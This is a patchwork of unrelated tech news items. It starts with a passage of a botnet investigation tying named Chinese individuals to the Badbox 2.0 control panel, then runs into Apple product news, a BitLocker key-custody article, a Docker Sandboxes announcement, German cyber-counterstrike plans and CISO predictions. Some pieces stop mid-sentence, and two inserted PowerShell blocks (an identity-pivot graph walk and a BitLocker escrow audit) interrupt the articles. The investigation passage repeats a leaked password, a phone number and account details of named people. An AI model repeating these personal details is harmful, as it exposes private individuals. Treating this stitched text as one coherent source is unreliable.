An online search for the address [email protected] (pictured in the screenshot above as the user “Chen“) shows it is listed as a point of contact for a number of China-based technology companies, including:
–Beijing Hong Dake Wang Science & Technology Co Ltd.
–Beijing Hengchuang Vision Mobile Media Technology Co. Ltd.
–Moxin Beijing Science and Technology Co. Ltd.
The website for Beijing Hong Dake Wang Science is asmeisvip[.]net, a domain that was flagged in a March 2025 report by HUMAN Security as one of several dozen sites tied to the distribution and management of the Badbox 2.0 botnet. Ditto for moyix[.]com, a domain associated with Beijing Hengchuang Vision Mobile.
A search at the breach tracking service Constella Intelligence finds [email protected] at one point used the password “cdh76111.” Pivoting on that password in Constella shows it is known to have been used by just two other email accounts: [email protected] and [email protected].
Constella found [email protected] registered an account at jd.com (China’s largest online retailer) in 2021 under the name “陈代海,” which translates to “Chen Daihai.” According to DomainTools.com, the name Chen Daihai is present in the original registration records (2008) for moyix[.]com, along with the email address cathead@astrolink[.]cn.
Incidentally, astrolink[.]cn also is among the Badbox 2.0 domains identified in HUMAN Security’s 2025 report. DomainTools finds cathead@astrolink[.]cn was used to register more than a dozen domains, including vmud[.]net, yet another Badbox 2.0 domain tagged by HUMAN Security.
XAVIER
A cached copy of astrolink[.]cn preserved at archive.org shows the website belongs to a mobile app development company whose full name is Beijing Astrolink Wireless Digital Technology Co. Ltd. The archived website reveals a “Contact Us” page that lists a Chen Daihai as part of the company’s technology department. The other person featured on that contact page is Zhu Zhiyu, and their email address is listed as xavier@astrolink[.]cn.
A Google-translated version of Astrolink’s website, circa 2009. Image: archive.org.
Astute readers will notice that the user Mr.Zhu in the Badbox 2.0 panel used the email address [email protected]. Searching this address in Constella reveals a jd.com account registered in the name of Zhu Zhiyu. A rather unique password used by this account matches the password used by the address [email protected], which DomainTools finds was the original registrant of astrolink[.]cn.
ADMIN
The very first account listed in the Badbox 2.0 panel — “admin,” registered in November 2020 — used the email address [email protected]. DomainTools shows this email is found in the 2022 registration records for the domain guilincloud[.]cn, which includes the registrant name “Huang Guilin.”
Constella finds [email protected] is associated with the China phone number 18681627767. The open-source intelligence platform osint.industries reveals this phone number is connected to a Microsoft profile created in 2014 under the name Guilin Huang (桂林 黄). The cyber intelligence platform Spycloud says that phone number was used in 2017 to create an account at the Chinese social media platform Weibo under the username “h_guilin.”
The public information attached to Guilin Huang’s Microsoft account, according to the breach tracking service osintindustries.com.
The remaining three users and corresponding qq.com email addresses were all connected to individuals in China. However, none of them (nor Mr. Huang) had any apparent connection to the entities created and operated by Chen Daihai and Zhu Zhiyu — or to any corporate entities for that matter. Also, none of these individuals responded to requests for comment.
The mind map below includes search pivots on the email addresses, company names and phone numbers that suggest a connection between Chen Daihai, Zhu Zhiyu, and Badbox 2.0.
This mind map includes search pivots on the email addresses, company names and phone numbers that appear to connect Chen Daihai and Zhu Zhiyu to Badbox 2.0.
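The pivoting the mind map encodes (a shared password links two mailboxes, a registrant name links a mailbox to a domain, a threat report links a domain to a botnet) can be walked mechanically once the observations are collected. What follows is an added example, not code from the KrebsOnSecurity article or from any of the services it names: a short PowerShell breadth-first walk over a constructed, fictitious set of selector links (email:A, pw:rare-1, name:Person-1, domain:D1 and so on are placeholders, not real accounts or domains). It applies the one caveat the article itself relies on when it notes a password was "known to have been used by just two other email accounts": a secret shared by many unrelated accounts is evidence of a weak password, not of a relationship, so the walk refuses to cross hubs whose fan-out exceeds a threshold.

```powershell
# Added example, not from the article: breadth-first pivoting over selector links.
# Every record below is a constructed placeholder, not a real account or domain.
$Observations = @(
    # email:A and email:B share a rare password -> strong link
    @{ From = 'email:A';       To = 'pw:rare-1';     Source = 'breach dump' },
    @{ From = 'email:B';       To = 'pw:rare-1';     Source = 'breach dump' },
    # email:B registered a retail account under a real name
    @{ From = 'email:B';       To = 'name:Person-1'; Source = 'retailer account' },
    # that name appears in old WHOIS for domain D1, alongside email:C
    @{ From = 'name:Person-1'; To = 'domain:D1';     Source = 'whois 2008' },
    @{ From = 'email:C';       To = 'domain:D1';     Source = 'whois 2008' },
    # email:C also registered D2, which a threat report tags as botnet infrastructure
    @{ From = 'email:C';       To = 'domain:D2';     Source = 'whois' },
    @{ From = 'domain:D2';     To = 'tag:botnet-c2'; Source = 'threat report' },
    # email:A also used a password shared with four strangers -> noise, not a link
    @{ From = 'email:A';       To = 'pw:common';     Source = 'breach dump' },
    @{ From = 'email:X1';      To = 'pw:common';     Source = 'breach dump' },
    @{ From = 'email:X2';      To = 'pw:common';     Source = 'breach dump' },
    @{ From = 'email:X3';      To = 'pw:common';     Source = 'breach dump' },
    @{ From = 'email:X4';      To = 'pw:common';     Source = 'breach dump' },
    # an unrelated pair that must stay outside the cluster
    @{ From = 'email:Z';       To = 'pw:rare-2';     Source = 'breach dump' }
)

function Get-PivotCluster {
    param(
        [Parameter(Mandatory)] [string]   $Seed,
        [Parameter(Mandatory)] [object[]] $Observations,
        [int] $MaxDepth  = 8,
        [int] $MaxFanOut = 3   # a selector shared by more than this many nodes is too common to pivot on
    )
    # Undirected adjacency list: selector -> list of (neighbour, source)
    $adj = @{}
    foreach ($o in $Observations) {
        foreach ($dir in 0, 1) {
            $a = if ($dir -eq 0) { $o.From } else { $o.To }
            $b = if ($dir -eq 0) { $o.To }   else { $o.From }
            if (-not $adj.ContainsKey($a)) { $adj[$a] = [System.Collections.ArrayList]::new() }
            [void] $adj[$a].Add([pscustomobject]@{ Next = $b; Source = $o.Source })
        }
    }

    $visited = @{ $Seed = $true }
    $queue   = [System.Collections.Generic.Queue[object]]::new()
    $queue.Enqueue([pscustomobject]@{ Node = $Seed; Depth = 0; Path = @($Seed) })
    $hits = [System.Collections.ArrayList]::new()

    while ($queue.Count -gt 0) {
        $cur = $queue.Dequeue()
        if ($cur.Depth -ge $MaxDepth -or -not $adj.ContainsKey($cur.Node)) { continue }
        foreach ($edge in $adj[$cur.Node]) {
            $next = $edge.Next
            if ($visited.ContainsKey($next)) { continue }
            # Hub check: a password or phone number reused by many unrelated accounts
            # proves a weak secret, not a relationship. Report tags may legitimately be hubs.
            if ($adj[$next].Count -gt $MaxFanOut -and $next -notlike 'tag:*') {
                $visited[$next] = $true   # never cross it, never re-evaluate it
                continue
            }
            $visited[$next] = $true
            $path = $cur.Path + $next
            [void] $hits.Add([pscustomobject]@{
                Depth    = $cur.Depth + 1
                Selector = $next
                Via      = $edge.Source
                Path     = ($path -join ' -> ')
            })
            $queue.Enqueue([pscustomobject]@{ Node = $next; Depth = $cur.Depth + 1; Path = $path })
        }
    }
    return $hits
}

Get-PivotCluster -Seed 'email:A' -Observations $Observations |
    Format-Table Depth, Selector, Via, Path -AutoSize
```

With the constructed data, the walk from email:A reaches pw:rare-1, email:B, name:Person-1, domain:D1, email:C, domain:D2 and finally tag:botnet-c2, while pw:common (five accounts, above the fan-out limit) and the unrelated email:Z never enter the cluster. The Via column is the provenance a write-up like the one above needs for each hop; the fan-out limit is the part most people forget and the reason a pivot on "123456" proves nothing.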
UNAUTHORIZED ACCESS
The idea that the Kimwolf botmasters could have direct access to the Badbox 2.0 botnet is a big deal, but explaining exactly why that is requires some background on how Kimwolf spreads to new devices. The botmasters figured out they could trick residential proxy services into relaying malicious commands to vulnerable devices behind the firewall on the unsuspecting user’s local network.
The vulnerable systems sought out by Kimwolf are primarily Internet of Things (IoT) devices like unsanctioned Android TV boxes and digital photo frames that have no discernible security or authentication built-in. Put simply, if you can communicate with these devices, you can compromise them with a single command.
Our January 2 story featured research from the proxy-tracking firm Synthient, which alerted 11 different residential proxy providers that their proxy endpoints were vulnerable to being abused for this kind of local network probing and exploitation.
Most of those vulnerable proxy providers have since taken steps to prevent customers from going upstream into the local networks of residential proxy endpoints, and it appeared that Kimwolf would no longer be able to quickly spread to millions of devices simply by exploiting some residential proxy provider.
However, the source of that Badbox 2.0 screenshot said the Kimwolf botmasters had an ace up their sleeve the whole time: Secret access to the Badbox 2.0 botnet control panel.
“Dort has gotten unauthorized access,” the source said. “So, what happened is normal proxy providers patched this. But Badbox doesn’t sell proxies by itself, so it’s not patched. And as long as Dort has access to Badbox, they would be able to load” the Kimwolf malware directly onto TV boxes associated with Badbox 2.0.
The source said it isn’t clear how Dort gained access to the Badbox botnet panel. But it’s unlikely that Dort’s existing account will persist for much longer: All of our notifications to the qq.com email addresses listed in the control panel screenshot received a copy of that image, as well as questions about the apparently rogue ABCD account.
Apple considered introducing a new Apple Intelligence feature that would dynamically re-arrange apps on the Home Screen.


The detail emerged in a report last week from The Information, which said that subordinates of software chief Craig Federighi approached him with proposals for an AI-powered iPhone ‌Home Screen‌. The feature would dynamically change the locations of apps on the ‌Home Screen‌ according to users' needs. Federighi reportedly rejected the idea, believing that it would disorient users, many of whom rely on knowing the fixed location of apps on their ‌Home Screen‌ for quick access.

With iOS 26, Apple prioritized new ‌Apple Intelligence‌ features that included Live Translation, more powerful Visual Intelligence, ChatGPT image generation in Image Playground, and actions in Shortcuts. Broader and more capable ‌Apple Intelligence‌ features are expected to arrive later this year with iOS 27, such as a Siri chatbot powered by Google Gemini.

The rest of The Information's report focused on how Apple restructured its artificial intelligence strategy under Federighi, accelerating plans to overhaul Siri by relying on external AI models after years of internal delays and organizational friction.
This article, "Apple Considered AI-Powered iPhone Home Screen" first appeared on MacRumors.com

Cybersecurity researchers have discovered two malicious Microsoft Visual Studio Code (VS Code) extensions that are advertised as artificial intelligence (AI)-powered coding assistants, but also harbor covert functionality to siphon developer data to China-based servers. The extensions, which have 1.5 million combined installs and are still available for download from the official Visual Studio
Apple's AirTag 4-Pack is available for $69.99 today on Amazon, down from the original price of $99.00. Free shipping options have a delivery estimate around January 31, while Prime members should be able to get it delivered a few days sooner.

Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Overall, this is a solid second-best price on the AirTag 4-pack that's within $7 of the Amazon all-time low price, which we last tracked during the holiday season. We're not tracking any notable deals on the AirTag single pack right now.


Apple just announced a new model of the AirTag, which is set to feature longer range for item tracking, a louder speaker, and the same $99 price tag for a 4-Pack. The first generation model is still a solid Bluetooth tracker, particularly at Amazon's $29 discount this week.

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



This article, "Not Interested in Apple's New AirTag? Snag the First Gen AirTag 4-Pack for Just $69.99" first appeared on MacRumors.com

Microsoft gave Windows users' BitLocker encryption keys to US law enforcement officers, providing access to encrypted data, according to a news report.
The US Federal Bureau of Investigation approached Microsoft with a search warrant in early 2025, seeking keys to unlock encrypted data stored on three laptops in a case of alleged fraud involving the COVID unemployment assistance program in Guam. As the keys were stored on a Microsoft server, Microsoft adhered to the legal order and handed over the encryption keys, Forbes reported on Friday.
Microsoft did not immediately respond to a request for comment.
There have been instances in the past where the big tech companies were approached by law enforcement for access to devices but have resisted handing encryption keys to authorities.
BitLocker is a widely used tool for securing data at rest, whether by individuals or enterprises managing hundreds or thousands of Windows devices. By default, many Windows installations back up BitLocker recovery keys to Microsoft’s cloud services, where Microsoft can retrieve them if legally compelled with a valid order.
Custody issue, not BitLocker
BitLocker is designed to provide encryption for entire volumes, addressing the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned devices. As BitLocker is bundled with Windows 10 and Windows 11, it has effectively become the default full-disk encryption layer across Windows endpoints, say experts.
“BitLocker itself does not fail here. The software does what it is built to do, encrypts the disk, integrates into Windows, allows for easy recovery,” said Sanchit Vir Gogia, chief analyst at Greyhound Research.
While the encryption of BitLocker is robust, enterprises need to be mindful of who has custody of the keys, as this case illustrates.
“The encryption engine in BitLocker, using AES-128 or AES-256 in XTS mode, is built to resist modern cryptanalysis. Even the US Department of Homeland Security has admitted they lack the forensic tooling to break it directly. However, most enterprise fleets running Windows use tools like Intune and Autopilot to roll out and manage devices. In that flow, unless explicitly disabled, recovery keys are automatically backed up to Microsoft Entra ID. These keys are then viewable via the admin centre or retrievable through scripts,” Gogia said.
Where most enterprises go wrong
Enterprises using BitLocker should treat the recovery keys as highly sensitive, and avoid default cloud backup unless there is a clear business requirement and the associated risks are well understood and mitigated.
The safest configuration is to redirect those keys to on-premises Active Directory or a controlled enterprise key vault. Even if stored in corporate-controlled directory or service such as Microsoft Entra ID or Intune, there should be strong governance on who can read the keys, with effective logging and just-in-time access, said Amit Jaju, a global partner at Ankura Consulting. This can cut Microsoft out of the recovery loop, he said.
If keys have to reside in Microsoft’s cloud, use strong multi-factor authentication for admin roles, with conditional access and privileged-access workstations so a compromise of admin credentials does not automatically become a compromise of all keys, he said.
Enterprises should ensure strict access control and separation of duties. “Only a small, vetted group such as security operations, endpoint engineering, should have rights to view or export recovery keys. Approvals should be workflow-based, not ad hoc. Every key retrieval should leave an auditable, immutable trail, and ideally be tied to an incident or ticket ID,” said Jaju.
CISOs should also ensure that when devices are repurposed, decommissioned, or moved across jurisdictions, keys should be regenerated as part of the workflow to ensure old keys cannot be used.
Gogia warned of the long tail of insecure setups. Personal accounts linked during provisioning, or BYOD devices that silently sync keys to consumer dashboards, are invisible pathways for leakage. “If those keys sit outside your boundary, you no longer have a clean chain of custody. That’s not a theoretical risk. It’s something auditors are now actively checking,” he said.
As many breaches are not cryptographic but procedural, enterprises should have a formal playbook for when a recovery key can be used (lost PIN, internal investigation with legal approval, lawful order) and when it cannot (informal manager request to access an employee’s data), noted Jaju.
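The first question a practitioner will ask after reading the above is "where are my recovery keys escrowed right now, and can I move them?". The following PowerShell is an added example, not code from the Computerworld article or from Microsoft. It reports each volume's protectors, pulls the BitLocker management log events that record whether a recovery password was backed up and to which directory, writes the policy values behind the Group Policy for operating-system-drive recovery so that AD DS escrow is required before BitLocker is allowed to turn on, and rotates a volume's recovery password so that a copy already escrowed elsewhere stops working. The cmdlets are the real BitLocker module cmdlets; the function names are mine; the event IDs (845 success, 846 failure) and the FVE registry value names are the ones Windows uses for this policy, so verify them against your own build before relying on them. Run it elevated, and in production deliver the policy through GPO or Intune rather than writing the registry directly, so it is enforced and audited.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the Computerworld article or Microsoft): audit, enforce
# and rotate BitLocker recovery-key escrow on a Windows endpoint.

function Get-BitLockerEscrowReport {
    # One row per BitLocker volume: which protectors exist and whether a
    # recovery password (the 48-digit key that gets escrowed) is present at all.
    foreach ($vol in Get-BitLockerVolume) {
        $rp = @($vol.KeyProtector | Where-Object KeyProtectorType -eq 'RecoveryPassword')
        [pscustomobject]@{
            MountPoint         = $vol.MountPoint
            ProtectionStatus   = $vol.ProtectionStatus
            Protectors         = (@($vol.KeyProtector.KeyProtectorType) -join ',')
            RecoveryPasswordId = (@($rp.KeyProtectorId) -join ',')
        }
    }
}

function Get-BitLockerEscrowEvents {
    param([int] $Days = 30)
    # Event 845 = recovery info backed up successfully, 846 = backup failed.
    # The message text names the target (AD DS or Entra ID), which is exactly the
    # custody question the article raises. No event at all means nothing was escrowed.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-BitLocker/BitLocker Management'
        Id        = 845, 846
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Message'; e = { ($_.Message -replace '\s+', ' ') } }
}

function Set-BitLockerAdEscrowPolicy {
    # Registry values behind the GPO "Choose how BitLocker-protected operating
    # system drives can be recovered" (Administrative Templates > Windows Components >
    # BitLocker Drive Encryption > Operating System Drives). Equivalent to ticking
    # "Save BitLocker recovery information to AD DS" and "Do not enable BitLocker
    # until recovery information is stored to AD DS".
    $fve = 'HKLM:\SOFTWARE\Policies\Microsoft\FVE'
    if (-not (Test-Path $fve)) { New-Item -Path $fve -Force | Out-Null }
    $values = [ordered]@{
        OSRecovery                     = 1   # enable the recovery-options policy
        OSActiveDirectoryBackup        = 1   # escrow recovery info to AD DS
        OSActiveDirectoryInfoToStore   = 1   # store recovery passwords and key packages
        OSRequireActiveDirectoryBackup = 1   # refuse to turn BitLocker on until escrow succeeded
    }
    foreach ($kv in $values.GetEnumerator()) {
        Set-ItemProperty -Path $fve -Name $kv.Key -Value $kv.Value -Type DWord
    }
}

function Reset-BitLockerRecoveryPassword {
    param([Parameter(Mandatory)] [string] $MountPoint)
    # Rotation order matters: add the new protector, escrow it, and only then remove
    # the old one, so there is never a moment with no escrowed recovery path.
    $old = @((Get-BitLockerVolume -MountPoint $MountPoint).KeyProtector |
            Where-Object KeyProtectorType -eq 'RecoveryPassword')
    $vol = Add-BitLockerKeyProtector -MountPoint $MountPoint -RecoveryPasswordProtector
    $new = $vol.KeyProtector |
        Where-Object { $_.KeyProtectorType -eq 'RecoveryPassword' -and $_.KeyProtectorId -notin $old.KeyProtectorId }
    # Backup-BitLockerKeyProtector escrows to AD DS; for Entra-joined devices use
    # BackupToAAD-BitLockerKeyProtector with the same parameters instead.
    Backup-BitLockerKeyProtector -MountPoint $MountPoint -KeyProtectorId $new.KeyProtectorId | Out-Null
    foreach ($p in $old) {
        Remove-BitLockerKeyProtector -MountPoint $MountPoint -KeyProtectorId $p.KeyProtectorId | Out-Null
    }
    return $new.KeyProtectorId
}

Get-BitLockerEscrowReport | Format-Table -AutoSize
Get-BitLockerEscrowEvents | Format-Table -AutoSize -Wrap
# Set-BitLockerAdEscrowPolicy                       # domain-joined machines only
# Reset-BitLockerRecoveryPassword -MountPoint 'C:'  # after a device changes hands or jurisdiction
```

Two points worth noting. A fleet report built from the first two functions is the evidence the auditors Gogia mentions will ask for: it shows whether escrow happened and where. And rotation, not deletion, is the correct response to a key that has already left your boundary: the old 48-digit password is useless once its protector is removed from the volume, regardless of how many copies of it exist in someone else's cloud.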
Geopolitics reshaping enterprise data and key control
Geopolitical tensions are also reshaping global trade and technology policies, something enterprises increasingly need to factor into their security strategies. As governments assert greater control over data, trade secrets and proprietary information risk becoming entangled in broader state interests.
Gogia warned, “The US CLOUD Act allows law enforcement to compel US-based providers to hand over data and keys, even if that data is hosted in Europe or Asia. Similarly, Chinese data localisation rules require keys and data to be accessible to state regulators. In India, recent legislation has introduced broad access rights for security agencies. And the EU is debating whether sovereignty must include key custody by design, not just data residency.”
If recovery keys are stored with a cloud provider, that provider may be compelled, at least in its home jurisdiction, to hand them over under a lawful order, even if the data subject or company is located elsewhere, and potentially without the company being notified. This is even more critical for a pharma company, semiconductor firm, defence contractor, or critical-infrastructure operator, since it exposes them to risks such as disclosure of trade secrets in cross-border investigations.
Jaju added, “Enterprises should assume that where keys are held, they can potentially be compelled. So where practical, ensure that the entities controlling keys are legally anchored in the jurisdiction whose laws and due-process standards you trust most. Establish board-level oversight on cross-border data access, including a register of government data-access requests, where legally permitted. For multinational companies, legal and security teams must work together to understand mutual legal-assistance treaties, CLOUD Act implications, and local interception laws.”
This article first appeared on Computerworld.

Outlook users have reported difficulties with Microsoft’s January Patch Tuesday updates, forcing Microsoft, once again, to patch some of its patches.
Users reported that, after applying the January 13 Windows updates, some applications became unresponsive or encountered unexpected errors when opening files from or saving files to cloud-based storage such as OneDrive or Dropbox. In particular, certain Microsoft Outlook configurations with the PST file containing a user's messages stored on OneDrive could cause Outlook to hang or lead to sent messages going missing or previously downloaded emails being re-downloaded.
In response, Microsoft has issued a bunch of out-of-band emergency updates for Windows 11 and 10 and Windows Server 2019, 2022, and 2025 to solve the problem.
This is not the first time that Microsoft has had to issue a patch for a patch. Just last week, it had to react when it inadvertently introduced two new bugs: an inability to connect to Windows Cloud PCs and an inability to shut down some machines with Secure Launch enabled. Prior to that, in October 2025, a patch caused a multitude of different issues, while in May 2025 Microsoft had to issue an out-of-band patch to fix a Windows 11 start-up failure.
Microsoft said the latest out-of-band updates are cumulative and include security fixes and improvements from the January 13, 2026, security update (KB5074109) and the out-of-band update (KB5077744) from January 17, 2026.
This article first appeared on Computerworld.
We introduced Docker Sandboxes in experimental preview a few months ago. Today, we’re launching the next evolution with microVM isolation, available now on macOS. Windows and Linux support is coming soon.
We started Docker Sandboxes to answer the question:
How do I run Claude Code or Gemini CLI safely?
Sandboxes provide disposable, isolated environments purpose-built for coding agents. Each agent runs in an isolated version of your development environment, so when it installs packages, modifies configurations, deletes files, or runs Docker containers, your host machine remains untouched.
This isolation lets you run agents like Claude Code, Gemini CLI, Codex, and Kiro with autonomy. Since they can’t harm your computer, let them run free.
Since our first preview, Docker Sandboxes have evolved. They’re now more secure, easier to use, and more powerful.
Level 4 Coding Agent Autonomy
Claude Code and other coding agents fundamentally change how developers write and maintain code. But a practical question remains: how do you let an agent run unattended (without constant permission prompts), while still protecting your machine and data? 
Most developers quickly run into the same set of problems trying to solve this:
OS-level sandboxing interrupts workflows and isn't consistent across platforms
Containers seem like the obvious answer, until the agent needs to run Docker itself
Full VMs work, but are slow, manual, and hard to reuse across projects
We started building Docker Sandboxes specifically to fill this gap.
Docker Sandboxes: MicroVM-Based Isolation for Coding Agents
Defense-in-depth, isolation by default
Each agent runs inside a dedicated microVM
Only your project workspace is mounted into the sandbox
Hypervisor-based isolation significantly reduces host risk
A real development environment
Agents can install system packages, run services, and modify files
Workflows run unattended, without constant permission approvals
Safe Docker access for coding agents
Coding agents can build and run Docker containers inside the microVM
They have no access to the host Docker daemon
One sandbox, many coding agents
Use the same sandbox experience with Claude Code, Gemini CLI, Codex, and Kiro
More to come (and we're taking requests!)
Fast reset, no cleanup
If an agent goes off the rails, delete the sandbox and spin up a fresh one in seconds
What’s New Since the Preview and What’s Next
The experimental preview validated the core idea: coding agents need an execution environment with clear isolation boundaries, not a stream of permission prompts. The early focus was developer experience, making it easy to spin up an environment that felt natural and productive for real workflows.
As Matt Pocock put it, “Docker Sandboxes have the best DX of any local AI coding sandbox I’ve tried.”
With this release, we’re making Sandboxes more powerful and secure with no compromise on developer experience.
What’s New
MicroVM-based isolation
Sandboxes now run on dedicated microVMs, adding a hard security boundary.
Network isolation with allow and deny lists
Control over coding agent network access.
Secure Docker execution for agents
Docker Sandboxes are the only sandboxing solution we’re aware of that allows coding agents to build and run Docker containers while remaining isolated from the host system.
What’s Next
We’re continuing to expand Docker Sandboxes based on developer feedback:
Windows support
MCP Gateway support
Ability to expose ports to the host device and access host-exposed services
Support for additional coding agents
Docker Sandboxes were made for developers who want to run coding agents unattended, experiment freely, and recover instantly when something goes wrong. They extend the usability of containers' isolation principles but with hard boundaries.
If you’ve been holding back on using agents because of permission prompts, system risk, or Docker-in-Docker limitations, Docker Sandboxes are built to remove those constraints.
We’re iterating quickly, and feedback from real-world usage will directly shape what comes next.

Apple today confirmed that iOS 26.2.1 and watchOS 26.2.1 are on the way. The updates will likely be released this week, so keep an eye out as early as today.


watchOS 26.2.1 was mentioned in Apple's press release for the new AirTag today, and iOS 26.2.1 is mentioned in fine print on the new AirTag's product page.

While these will be minor software updates, they do include a few things:
The new AirTag requires an iPhone running iOS 26.2.1 or later.
watchOS 26.2.1 expands the Precision Finding feature to the Apple Watch Series 9 and later, and Apple Watch Ultra 2 and later. We have not yet confirmed if this is only for the new AirTag, or if it also works with the original AirTag.
Beyond that, iOS 26.2.1 might include bug fixes and/or patch security vulnerabilities.
This article, "iOS 26.2.1 and watchOS 26.2.1 Are Coming Soon, Here's What's New" first appeared on MacRumors.com

Apple today introduced the next-generation AirTag, with key features including longer range for tracking items and a louder speaker.


With the new AirTag, Apple says the Precision Finding feature works up to 50% farther away from an item compared to the previous-generation model. The new AirTag also features an upgraded Bluetooth chip for improved overall range.

An updated internal design results in the new AirTag having a 50% louder speaker compared to the previous-generation model, according to Apple.

The new AirTag is available to order on Apple.com and in the Apple Store app starting today, and it will be available at Apple Store locations later this week. In the U.S., pricing remains set at $29 for an individual AirTag, while a four pack continues to cost $99.
This article, "Apple Unveils New AirTag With Longer Range, Louder Speaker, and More" first appeared on MacRumors.com

Apple today introduced a vibrant new Black Unity Apple Watch band called the "Unity Connection Braided Solo Loop."



The band features the colors of the Pan-African flag, containing multiple shades of red, green, and black. It is made by weaving recycled polyester yarn filaments around ultrathin silicone threads using precision-braiding machinery. It is soft with a textured feel, and is sweat and water resistant.

The Unity Connection Braided Solo Loop honors Black History Month and celebrates "the power of connection," according to Apple.



The new special edition band is available in 42mm and 46mm case sizes, in band sizes from zero to 12. It is available to order now, and will arrive at Apple Stores starting later this week. Apple continues to sell two other Black Unity bands: Unity Bloom and Unity Rhythm.
This article, "Apple Introduces New Black Unity Apple Watch Band" first appeared on MacRumors.com

Strava appears to be rolling out full route navigation and mapping to its watchOS app, bringing the long-awaited functionality to runners, hikers, and cyclists with Apple Watch for the first time.


The feature, which remains in beta, allows users to select a pre-loaded route, view elevation details, and follow directions directly from their wrist without having to look at their iPhone. Strava users on Reddit noted the feature began appearing over the weekend.

Since this time last year, Strava users have been able to share an Apple Fitness+ workout directly to the Strava app, but the ability to get turn-by-turn directions on an outdoor walk/run or bike ride feels like more of a game-changer for users of the fitness service.

Both paying and non-paying Strava users currently seem to have access to the beta feature, but it's unclear whether it will be reserved for paying subscribers when finalized. Strava has yet to officially comment on the rollout.
This article, "Strava Apple Watch App Gains Route Navigation in Beta" first appeared on MacRumors.com

If there's a constant in cybersecurity, it's that adversaries are always innovating. The rise of offensive AI is transforming attack strategies and making them harder to detect. Google's Threat Intelligence Group recently reported on adversaries using Large Language Models (LLMs) to both conceal code and generate malicious scripts on the fly, letting malware shape-shift in real time to evade
The North Korean threat actor known as Konni has been observed using PowerShell malware generated using artificial intelligence (AI) tools to target developers and engineering teams in the blockchain sector. The phishing campaign has targeted Japan, Australia, and India, highlighting the adversary's expansion of the targeting scope beyond South Korea, Russia, Ukraine, and European nations, Check
The German federal government intends to respond more offensively to cyberattacks in future. "We will strike back, including abroad. We will disrupt attackers and destroy their infrastructure," Federal Interior Minister Alexander Dobrindt (CSU) told the Süddeutsche Zeitung. Germany will set the threshold for such steps low, he said.
According to Dobrindt, the intelligence services and the Federal Criminal Police Office (Bundeskriminalamt) are to be jointly responsible for such counterstrikes. To better coordinate the work of the various levels, the Interior Ministry is planning a new defence centre against hybrid threats, which is currently being prepared by the Federal Office for the Protection of the Constitution (Bundesamt für Verfassungsschutz) and is to begin operating in the course of this year.
Intelligence services to receive new powers
Dobrindt complained that Germany is constantly experiencing cyberattacks on institutions, infrastructure and companies. The attacks often originate from groups with links to state intelligence services and funded by them, the CSU politician said, referring to hybrid attacks from Russia and other parts of the world. "We cannot accept that."
According to Dobrindt, Germany's intelligence services are also to receive new powers for gathering information and for other activities. "We were dependent on other people's information for too long. For me it is clear: we also need a Zeitenwende for the intelligence services," he said. He wants to enable the services to obtain more information themselves and to act operationally. He will present legislation to that end in the first half of the year. (dpa/jm)

View the full article
Last year was defined by AI hype, new attack models, and intensifying global tensions. As 2026 begins, security teams are asking what the next phase will look like. Will AI continue to accelerate risk, or will controls and governance finally catch up?
CSO spoke to 10 security leaders about their predictions and aspirations for 2026.
Governance scrambles to keep pace with AI
As AI becomes deeply embedded in day-to-day business operations, security leaders are being pushed to scale governance models far faster than before. For Barry Hensley, CISO at Brown & Brown Insurance, this translates to strengthening data guardrails by expanding data loss protection and monitoring, tightening identity controls, and introducing governance across both human and machine identities.
That push towards structure and oversight is also reshaping how organizations define security at scale. As United Airlines CISO Deneen DeFiore puts it, 2026 security will be less about perimeter defense and more about operational resilience at scale. “Threat actors will increasingly use generative AI to automate reconnaissance, social engineering, and exploit chaining, while defenders will rely on AI to prioritize risk, accelerate detection, and reduce response times,” she says. “The differentiator won’t be whether organizations use AI, but how well they govern, tune, and trust it.”
Meanwhile, Repurpose It CISO Noel Toal predicts that AI risk frameworks will increasingly reach board level. He believes these frameworks will give directors the structure and confidence to ask harder questions about AI exposure, triggering audits and helping unlock long-needed security funding.
DeFiore also expects governance conversations to shift beyond traditional risk management and towards continuous cyber resilience. “Boards and regulators are already asking not just, ‘Can you prevent an attack?’ but ‘Can you continue operating when one happens?’” She believes that change will drive deeper investment in identity security, segmentation, recovery testing, and third-party resilience rather than point solutions.
AI agents to reshape the threat landscape
But those same AI technologies are also changing the threat landscape. Toal points to a recent Anthropic report that documented the first large-scale AI-enabled cyberattack as an early warning sign. “I guarantee attackers will be more focused on using AI agents for what they want than a lot of businesses, because businesses in general are still very slow to adopt AI agents.”
In response, Toal says organizations will need to secure their own AI agents with the same rigor applied to human users. “We’ll have to treat internal AI agents as identities, and monitor what they access, when they run, and whether their behavior makes sense,” he says. Without that shift, he cautions, organizations risk unleashing tools inside their networks that attackers could readily turn against them.
Challenger CISO Katie Payten agrees the rise of agentic AI fundamentally expands the identity attack surface. “The perimeter isn’t just the external perimeter anymore; identity is the perimeter.” She adds that as organizations deploy AI agents internally, governance must extend beyond human users. “Knowing what your agent has access to, how it’s making decisions, and taking responsibility for that will be essential.”
As AI becomes more deeply integrated, the sensitive data these systems rely on will become “an increasingly attractive target”, with more AI-enabled attack methods “poised to occupy a growing share of the threat landscape,” according to Michael Garvin, CISO at Jaggaer. As a result, he believes data security posture management will also become more important. “Because AI depends on large volumes of high-quality, sensitive data, organizations will need better visibility into how that data is accessed, classified, and protected.”
For Gergana Winzer, partner and cyber security mid-market lead at KPMG, the real threat with AI is not just scale, but autonomy. She warns that AI-driven attacks will increasingly make their own target and execution decisions, reducing the need for human involvement. “Everything can be automated today, not only on the side of companies, but also on the side of the criminals,” she says, raising questions about how AI-enabled threats could extend beyond the digital realm into the physical world through AI-powered drones, for instance.
Security teams will consolidate visibility and automate response
When asked about what else 2026 could mean for the global security industry, Ramsay Healthcare CISO Manal Al-Sharif believes AI will play a crucial role in helping consolidate telemetry into a single view. “When you bring everything in, it’s easy to triage and prioritize,” she says. “Having that single point of view means you’re correlating everything at the same time, so you know where you’re exposed most … [and] before those threats become incidents.”
